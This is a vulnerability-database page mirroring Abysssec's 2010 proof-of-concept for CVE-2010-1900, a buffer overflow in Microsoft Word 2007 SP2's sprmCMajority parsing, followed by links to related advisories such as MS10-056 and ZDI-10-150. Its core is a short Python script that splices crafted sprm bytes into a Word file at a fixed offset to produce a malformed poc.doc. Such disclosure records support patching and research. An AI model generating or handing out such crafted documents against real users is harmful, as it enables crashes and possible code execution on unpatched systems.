Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAbysssec1337DAY-ID-14064
HistorySep 11, 2010 - 12:00 a.m.

Microsoft Office Word 2007 sprmCMajority Buffer Overflow

2010-09-1100:00:00
Abysssec
0day.today
17
JSON

Exploit for windows platform in category dos / poc

========================================================
Microsoft Office Word 2007 sprmCMajority Buffer Overflow
========================================================

  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900
 
'''
 
import sys
 
def main():
    
    try:
        fdR = open('src.doc', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]
         
        sprmCMajority = "\x47\xCA\xFF"    # sprmCMajority 
        sprmPAnld80 = "\x3E\xC6\xFF"    # sprmPAnld80
                 
        fdW= open('poc.doc', 'wb+')
        fdW.write(str1)
        fdW.write(sprmCMajority)
        fdW.write(sprmPAnld80)             
        fdW.write(str2)
         
        fdW.close()
        fdR.close()
        print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                 
if __name__ == '__main__':
    main()



#  0day.today [2018-01-09]  #

Related

seebug 2
zdi 1
prion 1
exploitdb 1
packetstorm 1
cvelist 1
cve 1
checkpoint_advisories 1
exploitpack 1
securityvulns 3
nvd 1
nessus 2
openvas 2
seebug
seebug
Microsoft Office Word 2007 - sprmCMajority Buffer Overflow
2014-07-01 00:00:00
Microsoft Word sprmCMajority记录解析栈溢出漏洞(MS10-056)
2010-08-17 00:00:00
zdi
zdi
Microsoft Office Word sprmCMajority Record Parsing Remote Code Execution Vulnerability
2010-08-11 00:00:00
prion
prion
Memory corruption
2010-08-11 18:47:00
exploitdb
exploitdb
Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow
2010-09-11 00:00:00
packetstorm
packetstorm
Month Of Abysssec Undisclosed Bugs - Microsoft Word
2010-09-11 00:00:00
cvelist
cvelist
CVE-2010-1900
2010-08-11 18:00:00
cve
cve
CVE-2010-1900
2010-08-11 18:47:50
checkpoint_advisories
checkpoint_advisories
Microsoft Word sprmCMajority Record Parsing Remote Code Execution (MS10-056; CVE-2010-1900)
2010-08-10 00:00:00
exploitpack
exploitpack
Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow
2010-09-11 00:00:00
securityvulns
securityvulns
ZDI-10-150: Microsoft Office Word sprmCMajority Record Parsing Remote Code Execution Vulnerability
2010-08-11 00:00:00
Microsoft Security Bulletin MS10-056 - Critical Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (2269638)
2010-08-11 00:00:00
Microsoft Office multiple security vulnerabilities
2010-08-16 00:00:00
nvd
nvd
CVE-2010-1900
2010-08-11 18:47:50
nessus
nessus
MS10-056 / MS10-057: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2269638 / 2269707) (Mac OS X)
2010-10-20 00:00:00
MS10-056: Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (2269638)
2010-08-11 00:00:00
openvas
openvas
Microsoft Office Word Remote Code Execution Vulnerabilities (2269638)
2010-08-11 00:00:00
Microsoft Office Word Remote Code Execution Vulnerabilities (2269638)
2010-08-11 00:00:00
JSON
Related for 1337DAY-ID-14064
seebug2zdi1prion1exploitdb1packetstorm1cvelist1cve1checkpoint_advisories1exploitpack1securityvulns3nvd1nessus2openvas2